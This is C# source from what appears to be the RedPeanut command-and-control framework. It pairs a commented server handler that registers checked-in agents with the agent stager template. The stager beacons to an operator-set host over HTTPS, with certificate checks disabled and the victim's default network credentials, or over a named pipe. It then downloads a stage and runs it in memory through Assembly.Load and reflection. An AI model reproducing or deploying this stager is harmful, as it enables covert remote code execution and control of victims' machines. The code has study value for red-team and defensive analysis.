/// <summary>
/// Handles the first stage of an inbound agent check-in: reads the request body, recovers the
/// encrypted <see cref="AgentIdReqMsg"/> carried in the <c>Paramname</c> parameter, registers a
/// new agent instance for it and answers with the agent-id message.
/// </summary>
/// <param name="reader">Reader over the raw HTTP request body; it is consumed to the end.</param>
/// <returns>
/// <c>Ok</c> with the string produced by <c>CreateMsgAgentId</c> on success; <c>NotFound</c> (with a
/// <c>Connection: Close</c> response header) when the body cannot be decrypted/deserialized or when
/// registering the agent fails.
/// </returns>
private ActionResult StepOne(StreamReader reader)
{
    AgentIdReqMsg agentidrequest = null;
    try
    {
        // The whole body is consumed here; GetParsedArgs splits it into key/value pairs
        // (presumably form-encoded - verify against GetParsedArgs).
        string line_t = reader.ReadToEnd();
        Dictionary<string, string> args = GetParsedArgs(line_t);
        // A missing parameter yields null here; DecryptMessage is expected to fail on it and
        // land in the catch below.
        var line = DecryptMessage(RedPeanutC2.server.GetServerKey(), args.GetValueOrDefault(Paramname));
        // NOTE(review): a payload that deserializes to JSON null leaves agentidrequest null; that
        // surfaces as a NullReferenceException in the second try block rather than here.
        agentidrequest = JsonConvert.DeserializeObject<AgentIdReqMsg>(line);
    }
    catch (Exception)
    {
        // Something went wrong decrypting or deserializing the message: answer "not found".
        // Every request without a well-formed, correctly encrypted payload ends up here, so the
        // 404 + "Connection: Close" pair is the server's observable reply to unexpected traffic.
        Console.WriteLine("[x] Something goes wrong decrypting or deserializing message return not found");
        Program.GetMenuStack().Peek().RePrintCLI(); // presumably redraws the interactive prompt after the console write
        httpContextAccessor.HttpContext.Response.Headers.Add("Connection", "Close");
        return (NotFound());
    }
    try
    {
        // NOTE(review): address, port, framework and AgentPivot are taken from the decrypted client
        // message as-is; nothing in this block validates them before they are stored on the instance.
        // The agent id comes from RandomString(10, ...) - presumably a 10-character random string.
        IAgentInstance agent = new AgentInstanceHttp(RedPeanutC2.server, RandomString(10, RedPeanutC2.server.GetRandomObject()), RedPeanutC2.server.GetServerKey(), agentidrequest.address, agentidrequest.port, agentidrequest.framework, Profileid);
        // If the request came through a pivoting agent, link the new agent to that pivoter.
        if (!string.IsNullOrEmpty(agentidrequest.AgentPivot))
        {
            // NOTE(review): GetAgent's result is assigned without a null check; an unknown pivot id
            // either leaves Pivoter null or throws into the catch below - confirm which.
            IAgentInstance agentInstance = RedPeanutC2.server.GetAgent(agentidrequest.AgentPivot);
            agent.Pivoter = agentInstance;
        }
        // Registration happens before the response is built, so the agent is known server-side
        // even if the reply never reaches the client.
        RedPeanutC2.server.RegisterAgentInbound(agent.AgentId, agent);
        string response = CreateMsgAgentId(agent, RedPeanutC2.server.GetServerKey(), Profileid, agentidrequest.framework);
        // Set cookie: the "sessionid" value is the agent id encrypted under the server key. The
        // stager reads this cookie from the response and hands it to the next stage.
        SetCookieValue("sessionid", EncryptMessage(RedPeanutC2.server.GetServerKey(), agent.AgentId), 0);
        Console.WriteLine("\n[*] Agent {0} connected", agent.AgentId);
        Program.GetMenuStack().Peek().RePrintCLI();
        return (Ok(response));
    }
    catch (Exception e)
    {
        // Operation error: instantiating, registering or answering the agent failed. Same
        // 404 + "Connection: Close" reply as the decryption failure above.
        Console.WriteLine("[x] Operation error {0}", e.Message);
        Program.GetMenuStack().Peek().RePrintCLI();
        httpContextAccessor.HttpContext.Response.Headers.Add("Connection", "Close");
        return (NotFound());
    }
}
public static void Execute() { string[] pageget = { #PAGEGET # }; string[] pagepost = { #PAGEPOST # }; string param = "#PARAM#"; string serverkey = "#SERVERKEY#"; string host = "#HOST#"; string namedpipe = "#PIPENAME#"; int port = 0; int targetframework = 40; Int32.TryParse("#PORT#", out port); Int32.TryParse("#FRAMEWORK#", out targetframework); Thread.Sleep(10000); AgentIdReqMsg agentIdReqMsg = new AgentIdReqMsg(); agentIdReqMsg.address = host; agentIdReqMsg.port = port; agentIdReqMsg.request = "agentid"; agentIdReqMsg.framework = targetframework; string agentidrequesttemplate = new JavaScriptSerializer().Serialize(agentIdReqMsg); bool agentexit = false; while (true && !agentexit) { try { string resp = ""; string cookievalue = ""; NamedPipeClientStream pipe = null; if (string.IsNullOrEmpty(namedpipe)) { CookiedWebClient wc = new CookiedWebClient(); wc.UseDefaultCredentials = true; wc.Proxy = WebRequest.DefaultWebProxy; wc.Proxy.Credentials = CredentialCache.DefaultNetworkCredentials; WebHeaderCollection webHeaderCollection = new WebHeaderCollection(); webHeaderCollection.Add(HttpRequestHeader.UserAgent, "#USERAGENT#"); #HEADERS # wc.Headers = webHeaderCollection; ServicePointManager.Expect100Continue = true; ServicePointManager.SecurityProtocol = (SecurityProtocolType)3072; ServicePointManager.DefaultConnectionLimit = 9999; ServicePointManager.ServerCertificateValidationCallback = new RemoteCertificateValidationCallback(delegate { return(true); }); string post = String.Format("{0}={1}", param, EncryptMessage(serverkey, agentidrequesttemplate)); string rpaddress = String.Format("https://{0}:{1}/{2}", host, port, pagepost[new Random().Next(pagepost.Length)], post); resp = wc.UploadString(rpaddress, post); Cookie cookie = wc.ResponseCookies["sessionid"]; cookievalue = cookie.Value; } else { try { pipe = new NamedPipeClientStream(host, namedpipe, PipeDirection.InOut, PipeOptions.Asynchronous); pipe.Connect(5000); pipe.ReadMode = PipeTransmissionMode.Message; //Write 
AgentIdReqMsg var agentIdrequest = EncryptMessage(serverkey, agentidrequesttemplate); pipe.Write(Encoding.Default.GetBytes(agentIdrequest), 0, agentIdrequest.Length); var messageBytes = ReadMessage(pipe); resp = Encoding.UTF8.GetString(messageBytes); } catch (Exception) { } } var line = DecryptMessage(serverkey, resp); AgentIdMsg agentIdMsg = new JavaScriptSerializer().Deserialize <AgentIdMsg>(line); object[] agrsstage = new object[] { line, cookievalue, pipe }; System.Reflection.Assembly assembly = System.Reflection.Assembly.Load(getPayload(agentIdMsg.stage)); assembly.GetTypes()[0].GetMethods()[0].Invoke(null, agrsstage); }